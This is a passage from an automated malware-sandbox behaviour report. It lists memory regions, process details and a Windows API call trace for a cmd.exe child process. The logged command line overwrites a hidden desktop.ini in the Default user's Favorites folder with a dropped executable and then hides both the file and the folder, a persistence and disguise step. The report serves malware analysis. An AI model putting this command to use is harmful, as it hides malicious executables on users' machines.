"private_0x0000000000010000" filename = "" Region: id = 30938 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30939 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30940 start_va = 0x160000 end_va = 0x166fff entry_point = 0x160000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30941 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30942 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30943 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30944 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30945 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 30946 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30947 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30948 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30949 start_va = 0x50000 
end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30950 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 30951 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 30952 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30953 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30954 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30955 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30956 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30957 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30958 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30959 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30960 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30961 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30962 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30963 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30964 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 30965 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30966 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 712 os_tid = 0x8c4 Process: id = "512" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x9ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 
"child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30999 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31000 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31001 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31002 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 31003 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31004 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 
31005 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31006 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31007 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 31008 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31057 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31058 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31059 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31060 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 31061 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 31062 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31063 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 
31064 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31065 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31066 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31067 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31068 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31069 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31070 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31071 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31072 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31073 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = 
"msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31074 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 31075 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 31076 start_va = 0x2b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 31077 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 31078 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 31079 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 31080 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 31081 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 715 os_tid = 0x9bc [0211.026] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afcac | out: lpSystemTimeAsFileTime=0x2afcac*(dwLowDateTime=0xb296e840, dwHighDateTime=0x1d440a9)) [0211.026] GetCurrentProcessId () returned 0x9ac [0211.026] GetCurrentThreadId () returned 0x9bc [0211.026] GetTickCount () returned 0x3b3a5 [0211.026] QueryPerformanceCounter (in: lpPerformanceCount=0x2afca4 | out: lpPerformanceCount=0x2afca4*=26781568638) returned 1 [0211.027] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0211.027] 
__set_app_type (_Type=0x1) [0211.027] __p__fmode () returned 0x76b331f4 [0211.027] __p__commode () returned 0x76b331fc [0211.027] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0211.027] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0211.027] GetCurrentThreadId () returned 0x9bc [0211.027] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9bc) returned 0x38 [0211.028] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0211.028] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0211.028] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.028] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0211.028] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afc3c | out: phkResult=0x2afc3c*=0x0) returned 0x2 [0211.028] VirtualQuery (in: lpAddress=0x2afc73, lpBuffer=0x2afc0c, dwLength=0x1c | out: lpBuffer=0x2afc0c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0211.028] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afc0c, dwLength=0x1c | out: lpBuffer=0x2afc0c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0211.028] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afc0c, dwLength=0x1c | out: lpBuffer=0x2afc0c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0211.028] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afc0c, dwLength=0x1c | out: 
lpBuffer=0x2afc0c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0211.028] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afc0c, dwLength=0x1c | out: lpBuffer=0x2afc0c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0211.028] GetConsoleOutputCP () returned 0x1b5 [0211.028] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0211.028] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0211.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.028] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0211.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0211.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.029] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0211.029] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.029] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0211.029] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.029] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0211.029] GetEnvironmentStringsW () returned 0x470470* [0211.029] FreeEnvironmentStringsW (penv=0x470470) returned 1 [0211.029] GetEnvironmentStringsW () returned 0x470470* [0211.029] FreeEnvironmentStringsW (penv=0x470470) returned 1 [0211.029] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebac | out: phkResult=0x2aebac*=0x40) returned 0x0 [0211.029] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x20, 
lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x1, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x1, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x0, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x40, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x40, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x40, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegCloseKey (hKey=0x40) returned 0x0 [0211.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebac | out: phkResult=0x2aebac*=0x40) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x40, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegQueryValueExW (in: 
hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x1, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x1, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x0, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x9, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x4, lpData=0x2aebb8*=0x9, lpcbData=0x2aebb0*=0x4) returned 0x0 [0211.030] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebb4, lpData=0x2aebb8, lpcbData=0x2aebb0*=0x1000 | out: lpType=0x2aebb4*=0x0, lpData=0x2aebb8*=0x9, lpcbData=0x2aebb0*=0x1000) returned 0x2 [0211.030] RegCloseKey (hKey=0x40) returned 0x0 [0211.030] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ad [0211.030] srand (_Seed=0x5b8863ad) [0211.030] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h 
\"C:\\Users\\Default\\FAVORI~1\\Links\"" [0211.030] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"" [0211.031] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0211.031] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x471bd0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0211.031] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0211.031] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.031] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0211.031] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0211.031] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0211.031] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0211.031] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0211.031] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0211.031] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0211.031] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0211.031] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0211.031] SetEnvironmentVariableW 
(lpName="PROMPT", lpValue="$P$G") returned 1 [0211.031] GetEnvironmentStringsW () returned 0x4725c0* [0211.031] FreeEnvironmentStringsW (penv=0x4725c0) returned 1 [0211.032] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.032] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0211.032] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0211.032] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0211.032] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0211.032] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0211.032] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0211.032] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0211.032] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0211.032] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0211.032] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af978 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0211.032] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af978, lpFilePart=0x2af974 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af974*="Desktop") returned 0x18 [0211.032] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0211.032] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af6f4 | out: lpFindFileData=0x2af6f4) returned 0x470c50 [0211.032] FindClose (in: hFindFile=0x470c50 | out: hFindFile=0x470c50) returned 1 [0211.032] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af6f4 | out: lpFindFileData=0x2af6f4) returned 0x470c50 [0211.032] FindClose (in: hFindFile=0x470c50 | out: hFindFile=0x470c50) returned 1 [0211.032] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af6f4 | out: lpFindFileData=0x2af6f4) returned 0x470c50 [0211.032] FindClose (in: hFindFile=0x470c50 | out: hFindFile=0x470c50) returned 1 [0211.033] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0211.033] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0211.033] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0211.033] GetEnvironmentStringsW () returned 0x470470* [0211.033] FreeEnvironmentStringsW (penv=0x470470) returned 1 [0211.033] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0211.033] GetConsoleOutputCP () returned 0x1b5 [0211.033] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0211.033] GetUserDefaultLCID () returned 0x409 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0211.034] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afab8, 